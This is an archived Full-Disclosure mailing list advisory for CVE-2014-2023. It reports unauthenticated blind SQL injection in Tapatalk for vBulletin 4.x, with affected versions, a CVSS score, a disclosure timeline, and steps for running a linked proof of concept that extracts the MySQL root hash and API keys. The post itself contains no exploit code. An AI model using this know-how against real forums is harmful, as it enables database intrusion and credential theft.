| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <001f01cfe726$59d09890$0d71c9b0$@oststrom.com>
Date: Mon, 13 Oct 2014 22:43:16 +0200
From: "oststrom \(public\)" <pub@...strom.com>
To: <fulldisclosure@...lists.org>
Subject: [FD] CVE-2014-2023 - Tapatalk for vBulletin 4.x - multiple blind
sql injection (pre-auth)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
*Preliminary VulnNote*
CVE-2014-2023 - Tapatalk for vbulletin 4.x - multiple blind sql injection
(pre-auth)
============================================================================
========
Overview
- --------
date : 10/12/2014
cvss : 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N) base
cwe : 89
vendor : Tapatalk Inc
product : Tapatalk for vBulletin 4.x
versions affected: latest (to date)
5.2.1 (verified)
4.9.0 (verified)
exploitability :
* remotely exploitable
* NO authentication required
* NO user interaction required
* NO special configuration required (default settings)
Abstract
- ---------
Tapatalk for vBulletin 4.x does not properly sanitize some xmlrpc calls
allowing unauthenticated users to inject arbitrary SQL commands.
risk: high
!! Note !! - this is a preliminary VulnNote. The full PoC / Description
will
be made available within the next 7 days (see contact) to allow mobiquo
to
fix this.
googledork: see PoC code
Details
- --------
vulnerable component:
* stripped // see full VulnNote - (contact)
xmlrpc request is decoded, decoded attacker provided values are directly
being used in sql query.
Proof of Concept (PoC)
- ----------------------
see https://github.com/tintinweb/pub/cve-2013-2023
1) prerequesites
vBulletin 4.x with Tapatalk for vBulletin 4.x installed
2) run PoC
edit PoC to match your TARGET (, optionally DEBUG=True)
(optionally) edit your query to extract specific database values
Note: PoC will try to detect tapatalk on that host
run PoC
by default extracts
* mysql root hash (in case vBulletin db user has permissions to do so)
* vbulletin db record fields (apikey) - perfectly chains with
CVE-2014-2023
only limited by the vBulletin db_user access permissions
Timeline
- --------
2014-01-14: initial vendor contact, no response
2014-02-24: vendor contact, no response
2014-10-13: public disclosure
Contact
- --------
tintinweb - https://github.com/tintinweb/pub/cve-2013-2023
(0x721427D8)
-----BEGIN PGP SIGNATURE-----
iQIcBAEBAgAGBQJUPDjXAAoJEBgB43t1YjbLV+8P/0PiBwY4VL1PRzOaczzG3nX5
EEWIT/qNU9btlZ+aLiU3fpp7a5FIOMoAVcmGHDduVLifQe6WHmS7FdDfYgBDl0uT
b4L5zjPK1rDFHVxIWtRM5P4NpahE4ZItPQ1SMLmsAl6k3Vc7tM/ylHzh/Re/IuzM
xxLe3yXlMq7AV4u04MxxLNH/qc+pn2HLM+Q16tQvxLXHPXelwQ33BmAQdimUSg46
KVe2SZG37XAi7eR5HUnpykTVz57ZmqZBya6+VKXdO6Y1RuUYfmUjH1UzdHU1mV6K
KPr6PKeeVXBMf9QshLcSaEI33piYVqyk+Z1CtablfCtPemNBazTWRdKaorgrbpIT
pWoN9LpuJqRZLDmYfPf76KoxqeFjZKUnBwCyeNLJbAoxf+O8ZVMSf4Ig4oGTEgsc
l3y1XxYKpfwfuu4MxS9pyFPBAugdPXxd7JjRRhLot96/ZtH256nkgzLS0KkiqDSI
7AHNEQPhiZTAwf+Y1upRip2ZY4eTF1xPMNqrAUZtZXhqiDHZ1C8+pMI/baUcHsQc
4mMyVoISCyFUHEmqdM25rkCZNFj5PooFRKRgZJIqrzOXp5EqZ0kAmMOakvFeP76f
vGBpRhjbr0+7m50Q9beC86Dx/4nMTwaksMY4e09T/0WrNkVXjs4Wh83czK3SFR1E
n48luoNydVPisxHGQpRS
=Zjgy
-----END PGP SIGNATURE-----
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists